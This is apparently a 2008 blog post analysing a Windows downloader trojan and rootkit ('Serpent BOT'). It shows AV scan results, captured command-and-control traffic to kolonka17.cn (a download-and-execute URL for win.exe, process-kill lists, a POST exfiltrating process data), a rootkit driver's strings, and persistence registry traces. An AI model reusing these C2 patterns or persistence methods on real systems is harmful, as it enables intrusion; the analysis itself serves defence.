Serpent BOT (Web Based Malware)

Steve sent me another sample of malware he found, but this time, we found a Web Based Malware with a web-interface:

Web Based Malware

The file that established connections with the website was named load.exe and below there is the report of the scan:

Report Generated 22.11.2008 at 23.15.36 (GMT 1)
Filename: load.exe
File size: 27 KB
MD5 Hash: 97A860C202A8016E08818F3AA90525B8
SHA1 Hash: CADF466ABD29CD993DD81EC838282589D0077BAC
CRC32: 89416946
Application Type: Executable (EXE) 32bit
Packer detected: Microsoft Visual C++ 6.0
Self-Extract Archive: Nothing found
Binder Detector: Nothing found
Detection Rate: 23 on 23

Antivirus Result
a-squared Trojan-Downloader.Agent!IK
Avira AntiVir TR/Dldr.Agent.agl
Avast Win32:Small-JMK [Trj] (0)
AVG Trojan horse Downloader.Zlob.12.R
BitDefender Trojan.Crypt.AI
ClamAV Worm.Socks-11
Comodo TrojWare.Win32.PSW.Agent.NHG
Dr.Web Trojan.PWS.Pace
Ewido Downloader.Agent.llo
F-PROT 6 W32/Socks.A.gen!Eldorado (generic, not disinfectable)
G DATA Trojan-Downloader.Win32.Agent.llo A
IkarusT3 Trojan-Downloader.Agent
Kaspersky Trojan-Downloader.Win32.Agent.llo
McAfee BackDoor-DRW trojan
MHR (Malware Hash Registry) Virus Found – detect rate 75%
NOD32 v3 Win32/PSW.Agent.NHG trojan
Norman Trojan W32/Agent.EXZF ()
QuickHeal TrojanDownloader.Agent.llo
Solo Antivirus Infection TrojanDropper.Win32.Small.Bgx
Sophos Troj/Dloadr-BMT
TrendMicro WORM_SOCKS.BL
VBA32 Trojan-Downloader.Win32.Agent.llo
VirusBuster Trojan.DL.Agent.ETEH

When I executed this load.exe file, a lot of traffic was established with this domain:

1
kolonka17.cn

Internet traffic:

1
2
3
GET /loader/?&v=ver&s=9988 HTTP/1.1
User-Agent: _
Host: kolonka17.cn

With the traffic below, another executable file named win.exe will be downloaded and executed in my system:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
GET /loader/manda.php?id=-695459345&v=ver&s=9988 HTTP/1.1
User-Agent: _
Host: kolonka17.cn
Cookie: PHPSESSID=c153aa8346175853a68924e15fcbb0bf
 
HTTP/1.1 200 OK
Server: Apache/2
Content-length: 29
 
hxxp://kolonka17.cn/win.exe|5
 
GET /win.exe HTTP/1.1
User-Agent: _
Host: kolonka17.cn
Cookie: PHPSESSID=c153aa8346175853a68924e15fcbb0bf

Next we see new traffic to a new domain, where it sends a lot of encrypted data:

1
2
3
4
5
6
7
8
9
10
11
12
GET /40E8001431303134393536323335383537393339333234386C0000018D66000000007600000642EB00053085858585 HTTP/1.0
Host: 69.147.239.106
 
HTTP/1.0 200 OK
Date: Sat, 22 Nov 2008 09:04:03 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch9
Last-Modified: Sat, 22 Nov 2008 09:04:03 GMT
Cache-Control: no-cache
Content-Length: 107532
Connection: close
Content-Type: application/octet-stream
...

And below there is some interesting traffic:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
GET /loader/manda.php?id=-789987028&l=5&v=ver&s=9988 HTTP/1.1
User-Agent: _
Host: kolonka17.cn
Cookie: PHPSESSID=c153aa8346175853a68924e15fcbb0bf
 
HTTP/1.1 200 OK
Date: Sat, 22 Nov 2008 14:00:06 GMT
Server: Apache/2
Content-Length: 2
 
ok
 
GET /loader/proc_kill HTTP/1.1
User-Agent: _
Host: kolonka17.cn
Cookie: PHPSESSID=c153aa8346175853a68924e15fcbb0bf
 
HTTP/1.1 200 OK
Date: Sat, 22 Nov 2008 14:00:07 GMT
Server: Apache/2
Last-Modified: Wed, 12 Nov 2008 09:23:38 GMT
Content-Length: 185
Content-Type: text/plain
 
regedit.exe
msconfig.exe
taskmgr.exe
reg.exe
taskkill.exe
tskill.exe
tasklist.exe
infium.exe
notepad.exe
explorer.exe
nod32kui.exe
nod32kui.exe
egui.exe
egui.exe
putty.exe

The malware now gets the command to kill a list of processes on my system:

1
GET /loader/proc_kill HTTP/1.1

But the malware will not stop at just killing the processes! The malware will also delete some important executable files of the system, such as:

1
C:\WINDOWS\explorer.exe

In the new traffic below we can see the malware received another command:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
GET /loader/proc_run HTTP/1.1
User-Agent: _
Host: kolonka17.cn
Cookie: PHPSESSID=c153aa8346175853a68924e15fcbb0bf
 
HTTP/1.1 200 OK
Date: Sat, 22 Nov 2008 14:00:14 GMT
Server: Apache/2
Content-Length: 30
Content-Type: text/plain
 
none.exe
taskmon.exe
qip.exe
 
GET /loader/proc_killsize HTTP/1.1
User-Agent: _
Host: kolonka17.cn
Cookie: PHPSESSID=c153aa8346175853a68924e15fcbb0bf
 
HTTP/1.1 200 OK
Date: Sat, 22 Nov 2008 14:00:10 GMT
Server: Apache/2
Content-Length: 40
Content-Type: text/plain
 
tasklis2t.exe
inf3ium.exe
note4pad.exe

And is always related to process killing. After, we sent new traffic to the domain:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
POST /loader/data.php?id=-789987028 HTTP/1.1
Host: kolonka17.cn
Content-Type: application/x-www-form-urlencoded
Content-length: 289
 
proc=[System Process]
smss.exe
csrss.exe
winlogon.exe
services.exe
lsass.exe
svchost.exe
spoolsv.exe
explorer.exe
alg.exe
wscntfy.exe
ufo.exe
load.exe
14B.tmp
size=12800
0
0
0
108032
13312
14336
57856
13824
51200
27648
12800
 
HTTP/1.1 200 OK
Date: Sat, 22 Nov 2008 14:00:22 GMT
Content-Length: 0
Content-Type: text/html

We can see the malware has sent some information related to the current running processes of my system !! But note we have also sent the size of each process ! This information can be used by future malware versions, maybe to create some evading-code or to detect certain processes “not much loved” by the malware.

Next we received some traffic in the SMTP (25) port:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
Protocol          : TCP
Local Address     : 64.233.183.27
Local Port        : 25
 
220 mx.google.com ESMTP k5si310246nfh.0
 
Protocol          : TCP
Local Address     : 209.85.135.114
Local Port        : 25
 
220 mx.google.com ESMTP n10si1763302mue.37
 
Protocol          : TCP
Local Address     : 94.100.176.20
Local Port        : 25
 
220 Mail.Ru ESMTP
 
Protocol          : TCP
Local Address     : 216.157.145.27
Local Port        : 25
 
220 mail7.hsphere.cc ESMTP mail7.hsphere.cc; Sat Nov 22 09:20:00 2008

And a new driver is loaded by the malware:

1
C:\WINDOWS\system32\drivers\Winkk44.sys

Report of the scan:

Report Generated 22.11.2008 at 23.32.46 (GMT 1)
Filename: Winkk44.sys
File size: 32 KB
MD5 Hash: 286C4C43EFED1D81C59AA7BC70B83BD8
SHA1 Hash: 4D09AC6BE2808360697E7ECA71BEBF7CADFDE985
CRC32: 2495620378
Application Type: Executable (EXE) 32bit
Packer detected: Nothing found [Overlay] *
Self-Extract Archive: Nothing found
Binder Detector: Nothing found
Detection Rate: 7 on 24

Antivirus Result
a-squared Trojan-Dropper.Cutwail!IK
Avira AntiVir –
Avast –
AVG Virus found BackDoor.Ntrootkit
BitDefender Trojan.Dropper.Cutwail.D
ClamAV –
Comodo –
Dr.Web –
Ewido –
F-PROT 6 –
G DATA Trojan-Downloader.Win32.Mutant.aim A
IkarusT3 Trojan-Dropper.Cutwail
Kaspersky Trojan-Downloader.Win32.Mutant.aim
McAfee –
MHR (Malware Hash Registry) –
NOD32 v3 –
Norman –
Panda –
QuickHeal –
Solo Antivirus Infection TrojanDownloader.Win32.Mutant.Aim
Sophos –
TrendMicro –
VBA32 –
VirusBuster –

Again a Trojan.Dropper.Cutwail.D !

Below there are some interested strings extracted from Winkk44.sys:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
winlogon.exe
e:\0soft\loader\runtime3\objfre_wxp_x86\i386\runtime3.pdb
EXERESOURCE
\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\WinCtrl32
Asynchronous
Impersonate
StartShell
DLLName
WLEventStartShell
WinCtrl32.dll
\SystemRoot\system32\WinCtrl32.dll
ImagePath
Start
\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\
\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\
\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\
\DosDevices\Rntm74
\Device\Rntm74
\SystemRoot\system32\drivers\
\FileSystem
Winkk44.sys

As we can see from the image below, this driver is auto-loaded when the Operating System boots in Safe Mode:

Kernel driver loaded in safe mode

During the analysis, were not detected SSDT/Shadow SSDT Hooks, no Stealth Code, I get BSOD when trying to open certain Anti-Rootkit software, the file Winkk44_sys is protected from changing/modification/deletion and also the registry keys are protected from changing/modification/deletion.

Running processes that are visible with taskmanager:

Running processes

Registry keys used by the malware to startup with Windows:

Registry keys

Service info:

Registry keys of the rootkit driver

These are the malware traces we can see from an HijackThis log:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
Running processes:
C:\WINDOWS\system32\drivers\ctfmon.exe
%User%\Local Settings\Application Data\spool.exe
%User%\Local Settings\Application Data\spool.exe
%User%\Local Settings\Application Data\spool.exe
 
O2 - BHO: pl - {B200799F-9538-403d-9A6E-36F5942EC540} - C:\WINDOWS\system32\fklame32.dll (file missing)
O4 - HKLM\..\Run: [ntuser] C:\WINDOWS\system32\drivers\ctfmon.exe
O4 - HKLM\..\Run: [autoload] %User%\Local Settings\Application Data\spool.exe
O4 - HKCU\..\Run: [ntuser] C:\WINDOWS\system32\drivers\ctfmon.exe
O4 - HKCU\..\Run: [autoload] %User%\Local Settings\Application Data\spool.exe
O4 - HKUS\S-1-5-18\..\Run: [ntuser] C:\WINDOWS\system32\drivers\ctfmon.exe (User 'SYSTEM')
O4 - HKUS\S-1-5-18\..\Run: [autoload] C:\Documents and Settings\LocalService\Local Settings\Application Data\spool.exe (User 'SYSTEM')
O20 - Winlogon Notify: WinCtrl32 - C:\WINDOWS\SYSTEM32\WinCtrl32.dll
O23 - Service: Task Scheduler (Schedule) - Unknown owner - C:\WINDOWS\system32\drivers\ctfmon.exe

Below there is a small summary of the files created by the malware:

1
2
3
4
5
6
7
8
C:\WINDOWS\system32\ctfmon.exe
%User%\Local Settings\Application Data\spool.exe
%User%\ftpdll.dll
C:\WINDOWS\system32\WinCtrl32.dll
C:\WINDOWS\system32\fklame32.dll
C:\WINDOWS\system32\drivers\ctfmon.exe
C:\WINDOWS\system32\drivers\Winkk44.sys
C:\WINDOWS\system32\drivers\555.exe

Random Posts

Previous Posts